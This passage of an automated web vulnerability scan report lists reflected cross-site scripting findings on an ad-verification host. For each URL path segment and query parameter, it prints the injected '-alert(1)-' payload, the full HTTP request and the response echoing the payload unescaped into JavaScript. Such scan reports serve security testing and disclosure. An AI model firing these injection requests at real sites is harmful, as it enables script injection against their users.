The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84e09"-alert(1)-"3ddd304dc5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com84e09"-alert(1)-"3ddd304dc5c/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1CA0D78112ED7AFE589196D87A0D80C7; Path=/
Content-Type: text/javascript
Content-Length: 8178
Date: Thu, 16 Jun 2011 13:13:18 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com84e09"-alert(1)-"3ddd304dc5c/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://w
...[SNIP]...

3.66. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102769/PortalServe/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0db6"-alert(1)-"c7a967bdb2e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013c0db6"-alert(1)-"c7a967bdb2e/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=701A723D34815A78026CD357BCE63BA6; Path=/
Content-Type: text/javascript
Content-Length: 8178
Date: Thu, 16 Jun 2011 13:13:18 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013c0db6"-alert(1)-"c7a967bdb2e/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnb
...[SNIP]...

3.67. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102769/PortalServe/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aaf7"-alert(1)-"296655b6db9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/1027693aaf7"-alert(1)-"296655b6db9/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript
Content-Length: 8178
Date: Thu, 16 Jun 2011 13:13:20 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/1027693aaf7"-alert(1)-"296655b6db9/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r
...[SNIP]...

3.68. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102769/PortalServe/

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32bda"-alert(1)-"c1ac34d81b6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102769/PortalServe32bda"-alert(1)-"c1ac34d81b6/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8F28812B7A13C7AA543D45D8E7061F3A; Path=/
Content-Type: text/javascript
Content-Length: 8178
Date: Thu, 16 Jun 2011 13:13:21 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/102769/PortalServe32bda"-alert(1)-"c1ac34d81b6/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.513012333
...[SNIP]...

3.69. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [dom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102769/PortalServe/

Issue detail

The value of the dom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f783b"-alert(1)-"576397bbbf5 was submitted in the dom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.comf783b"-alert(1)-"576397bbbf5&r=0.5130123335402459 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E1A414CD5ADEDD5EB308AB38C0206C9; Path=/
Content-Type: text/javascript
Content-Length: 8178
Date: Thu, 16 Jun 2011 13:13:12 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2
...[SNIP]...
69/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.comf783b"-alert(1)-"576397bbbf5&r=0.5130123335402459",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:
...[SNIP]...

3.70. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [flash parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102769/PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3986"-alert(1)-"366c4954cf1 was submitted in the flash parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10c3986"-alert(1)-"366c4954cf1&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DC1D2DF8581C4A0FFEB51EAB10CF2613; Path=/
Content-Type: text/javascript
Content-Length: 8178
Date: Thu, 16 Jun 2011 13:13:11 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10c3986"-alert(1)-"366c4954cf1&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459",
   adsafeSep : "&",
   requrl : ""
...[SNIP]...

3.71. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102769/PortalServe/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77cbf"-alert(1)-"3f1c36aac1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459&77cbf"-alert(1)-"3f1c36aac1a=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7E6267C42D77B8B67F0F776665E684AC; Path=/
Content-Type: text/javascript
Content-Length: 8181
Date: Thu, 16 Jun 2011 13:13:15 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2
...[SNIP]...
99616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459&77cbf"-alert(1)-"3f1c36aac1a=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=functi
...[SNIP]...

3.72. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102769/PortalServe/

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e45c"-alert(1)-"c700be9c329 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y097201105062037279e45c"-alert(1)-"c700be9c329&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=167E9250F08C859CE20774A008608ED2; Path=/
Content-Type: text/javascript
Content-Length: 8178
Date: Thu, 16 Jun 2011 13:13:09 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y097201105062037279e45c"-alert(1)-"c700be9c329&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459",
   adsafeSep : "&",
   re
...[SNIP]...

3.73. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [pos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102769/PortalServe/

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db690"-alert(1)-"610d475ab43 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=xdb690"-alert(1)-"610d475ab43&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9B3414356741EAECEC3146C0A52E7B12; Path=/
Content-Type: text/javascript
Content-Length: 8178
Date: Thu, 16 Jun 2011 13:13:11 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2
...[SNIP]...
pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=xdb690"-alert(1)-"610d475ab43&dom=http://www.cnbc.com&r=0.5130123335402459",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={IN
...[SNIP]...

3.74. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [r parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102769/PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6de4"-alert(1)-"5438f890514 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459a6de4"-alert(1)-"5438f890514 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D399DFFB64584611ED225A29FA7471D9; Path=/
Content-Type: text/javascript
Content-Length: 8178
Date: Thu, 16 Jun 2011 13:13:13 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2
...[SNIP]...
299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459a6de4"-alert(1)-"5438f890514",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function
...[SNIP]...

3.75. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [redir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102769/PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9d7d"-alert(1)-"71735677735 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$f9d7d"-alert(1)-"71735677735&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E0ABCDA15DB26908D0602455BC1E47A1; Path=/
Content-Type: text/javascript
Content-Length: 8178
Date: Thu, 16 Jun 2011 13:13:11 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2
...[SNIP]...
w/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$f9d7d"-alert(1)-"71735677735&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
